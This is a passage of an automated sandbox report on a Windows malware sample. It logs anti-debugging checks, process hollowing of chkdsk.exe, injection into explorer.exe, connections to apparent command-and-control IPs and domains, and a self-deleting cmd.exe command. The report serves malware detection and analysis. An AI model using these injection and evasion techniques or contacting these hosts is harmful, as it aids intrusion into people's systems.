          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]10_2_04DAB944
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]10_2_04D8B171
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]10_2_04D8B171
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C962 mov eax, dword ptr fs:[00000030h]10_2_04D8C962
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]10_2_04D89100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]10_2_04D89100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]10_2_04D89100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]10_2_04DB513A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]10_2_04DB513A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov ecx, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2ACB mov eax, dword ptr fs:[00000030h]10_2_04DB2ACB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2AE4 mov eax, dword ptr fs:[00000030h]10_2_04DB2AE4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]10_2_04DBD294
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]10_2_04DBD294
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]10_2_04D9AAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]10_2_04D9AAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFAB0 mov eax, dword ptr fs:[00000030h]10_2_04DBFAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]10_2_04E3B260
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]10_2_04E3B260
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58A62 mov eax, dword ptr fs:[00000030h]10_2_04E58A62
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC927A mov eax, dword ptr fs:[00000030h]10_2_04DC927A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4EA55 mov eax, dword ptr fs:[00000030h]10_2_04E4EA55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E14257 mov eax, dword ptr fs:[00000030h]10_2_04E14257
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA3A1C mov eax, dword ptr fs:[00000030h]10_2_04DA3A1C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov ecx, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]10_2_04D8AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]10_2_04D8AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98A0A mov eax, dword ptr fs:[00000030h]10_2_04D98A0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]10_2_04DC4A2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]10_2_04DC4A2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]10_2_04E4AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]10_2_04E4AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]10_2_04E053CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]10_2_04E053CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DADBE9 mov eax, dword ptr fs:[00000030h]10_2_04DADBE9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E55BA5 mov eax, dword ptr fs:[00000030h]10_2_04E55BA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBB390 mov eax, dword ptr fs:[00000030h]10_2_04DBB390
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2397 mov eax, dword ptr fs:[00000030h]10_2_04DB2397
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]10_2_04D91B8F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]10_2_04D91B8F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3D380 mov ecx, dword ptr fs:[00000030h]10_2_04E3D380
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4138A mov eax, dword ptr fs:[00000030h]10_2_04E4138A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]10_2_04DB4BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]10_2_04DB4BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]10_2_04DB4BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8F358 mov eax, dword ptr fs:[00000030h]10_2_04D8F358
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB40 mov eax, dword ptr fs:[00000030h]10_2_04D8DB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]10_2_04DB3B7A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]10_2_04DB3B7A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB60 mov ecx, dword ptr fs:[00000030h]10_2_04D8DB60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58B58 mov eax, dword ptr fs:[00000030h]10_2_04E58B58
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4131B mov eax, dword ptr fs:[00000030h]10_2_04E4131B
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00409B40 LdrLoadDll,3_2_00409B40
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 166.88.62.202 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.casatowerofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.bitconga.com
          Source: C:\Windows\explorer.exeDomain query: www.totalwinerewards.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.200 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tothelaundry.com
          Source: C:\Windows\explorer.exeDomain query: www.omnipets.store
          Source: C:\Windows\explorer.exeNetwork Connect: 46.252.151.235 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.231.72.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.webarate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.experiencedlawfirms.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 90000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeMemory written: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.381888349.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.363941533.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.348780458.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.443876033.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.386172183.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.374858871.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.390116935.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
